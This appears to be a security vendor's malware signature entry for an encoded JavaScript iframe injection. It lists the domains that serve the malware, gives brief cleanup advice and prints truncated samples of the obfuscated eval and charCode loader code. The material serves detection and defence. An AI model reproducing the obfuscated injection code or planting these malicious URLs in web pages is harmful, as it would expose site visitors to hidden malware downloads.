SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwiframehd203

malware-entry-mwiframehd203

Description:

Javascript encoded to hide an iframe from multiple sources. Including:


fenkaololo.com
oooabterast0.co.cc
http://gtrafx.com/go.php?sid=1
http://bhykntyg.co.cc/showthread.php?t=41130521
http://rioclmac.net/includ.php
http://jamesbsmith4th.me
hedonaba.cc
divacofa.cc
pulpic.com
http://chrisalrussia.ru/iframe.php?id=5dzoaxv0kk9eh5claywi7hbqyh4g12e
xbx.tw/in.cgi?3 (and many other domains).

This is used to load malware from external web sites while not being visible to the user. It is also known as Trojan.JS.Iframe on different anti virus products.

Also related to this malware: http://sucuri.net/malware-injection-sidename-js.html (that generates the Blackhole exploit alert on some AVs).

Affecting:

Any web site

Clean up:

This malware is generally hidden on .js or .php files with heavy encoding. Searching/replacing what the scanner identified should fix it. If not, contact our support team for help.

 

Malware dump (sample of malware):


var XiLgdMoRSAbuUBAgpMkf = "uKNMv60uKNMv105uKNMv102uKNMv114uKNMv97uKNMv109uKNMv101uKN...

var htz={dt:function(){return htz.dh();},dh:function(res){var w="1489,1976,837,551,1369....
var ar="sg]pw1=} [tNrl>hd,C;vB0'bo"aumEA.n)y{c/:fe<(i T";try{try{qwe()}catch(...
var  i={j:{"i":{i:'~',l:'.',j:'^'},l:{i:"%" ,l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl"}},i:{i:{i:function(j){try{var l=document "x63x72x65x61x74x65x45x6cx65x6dx65x6ex74';l['x74x79x70x65']="x68...
el= document.createElement("div");el.innerHTML="& #82 ;& #101; & #102;& #101;& #114;& #101;& ..
var s,q=2,aa=document&#46createTextNode("harCode"); if(Math&#46abs(-"2")===2){s=String["fromC"+aa&#46nodeValue];} eval(s(7+q,7+q,103+q,100+q,30+q,38+q,98+q,109+q,97+q,115+q,107+q,99+q,108+q, 114+q,44+q,101+q,99+q,114+q,67+q,106+q,99+q,107+q,99+q,108+q,114+q,113+q,64+q,119+q, 82+q,95+q,101+q,76+q,95+q,107+q,99+q,38+q,37+q,96+q,109+q,98+q,119+q,37+q,39+q,89+q...